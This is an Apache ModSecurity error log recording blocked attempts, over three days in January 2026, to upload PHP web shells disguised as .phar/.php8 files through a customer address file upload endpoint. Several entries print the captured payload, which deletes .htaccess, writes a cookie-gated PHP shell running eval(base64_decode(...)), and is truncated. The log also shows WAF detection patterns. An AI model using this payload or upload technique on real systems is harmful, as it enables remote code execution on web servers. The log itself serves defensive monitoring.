[Fri Jan 02 16:37:14.921366 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.phar"] [unique_id "aVfmKvsbH8tYtcPf-0nO1AAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 02 16:37:14.923722 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.phar"] [unique_id "aVfmKvsbH8tYtcPf-0nO1AAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 02 16:37:14.923939 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.phar"] [unique_id "aVfmKvsbH8tYtcPf-0nO1AAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 02 16:37:15.309540 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: v188364f428d25.php8 found within FILES:custom_attributes[country_id]: v188364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVfmK_sbH8tYtcPf-0nO1QAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/1/v188364f428d25.phar
[Fri Jan 02 16:37:15.310209 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVfmK_sbH8tYtcPf-0nO1QAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/1/v188364f428d25.phar
[Fri Jan 02 16:37:15.310420 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVfmK_sbH8tYtcPf-0nO1QAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/1/v188364f428d25.phar
[Fri Jan 02 16:37:16.005068 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Rule 7f31a6cfdbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.php8"] [unique_id "aVfmLPsbH8tYtcPf-0nO1gAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 02 16:37:16.005546 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.php8"] [unique_id "aVfmLPsbH8tYtcPf-0nO1gAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 02 16:37:16.007983 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.php8"] [unique_id "aVfmLPsbH8tYtcPf-0nO1gAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 02 16:37:16.008170 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.php8"] [unique_id "aVfmLPsbH8tYtcPf-0nO1gAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:28.618669 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Rule 7fb694cbcbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.phar"] [unique_id "aVld7OBK5Fkh2nPgRGm11QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:28.619167 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.phar"] [unique_id "aVld7OBK5Fkh2nPgRGm11QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:28.621597 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.phar"] [unique_id "aVld7OBK5Fkh2nPgRGm11QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:28.621789 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.phar"] [unique_id "aVld7OBK5Fkh2nPgRGm11QAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:28.903131 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: zh88364f428d25.php8 found within FILES:custom_attributes[country_id]: zh88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVld7OBK5Fkh2nPgRGm11gAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/h/zh88364f428d25.phar
[Sat Jan 03 19:20:28.903825 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVld7OBK5Fkh2nPgRGm11gAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/h/zh88364f428d25.phar
[Sat Jan 03 19:20:28.903998 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVld7OBK5Fkh2nPgRGm11gAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/h/zh88364f428d25.phar
[Sat Jan 03 19:20:29.264881 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Rule 7fb694cbcbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.php8"] [unique_id "aVld7eBK5Fkh2nPgRGm11wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:29.265368 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.php8"] [unique_id "aVld7eBK5Fkh2nPgRGm11wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:29.267928 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.php8"] [unique_id "aVld7eBK5Fkh2nPgRGm11wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 03 19:20:29.268123 2026] [:error] [pid 1159392] [client 46.149.66.101:34840] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/h/zh88364f428d25.php8"] [unique_id "aVld7eBK5Fkh2nPgRGm11wAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 04 21:57:18.564421 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Rule 7f7d580b6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aVrULmAl4u4uHVCLj6p-VgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 04 21:57:18.565027 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aVrULmAl4u4uHVCLj6p-VgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 04 21:57:18.567315 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aVrULmAl4u4uHVCLj6p-VgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 04 21:57:18.567500 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aVrULmAl4u4uHVCLj6p-VgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 04 21:57:22.784143 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: bt88364f428d25.php8 found within FILES:custom_attributes[country_id]: bt88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVrUMmAl4u4uHVCLj6p-VwAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/t/bt88364f428d25.phar
[Sun Jan 04 21:57:22.784800 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVrUMmAl4u4uHVCLj6p-VwAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/t/bt88364f428d25.phar
[Sun Jan 04 21:57:22.784969 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVrUMmAl4u4uHVCLj6p-VwAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/t/bt88364f428d25.phar
[Sun Jan 04 21:57:26.642487 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Rule 7f7d580b6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aVrUNmAl4u4uHVCLj6p-WAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 04 21:57:26.642936 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aVrUNmAl4u4uHVCLj6p-WAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 04 21:57:26.645262 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aVrUNmAl4u4uHVCLj6p-WAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
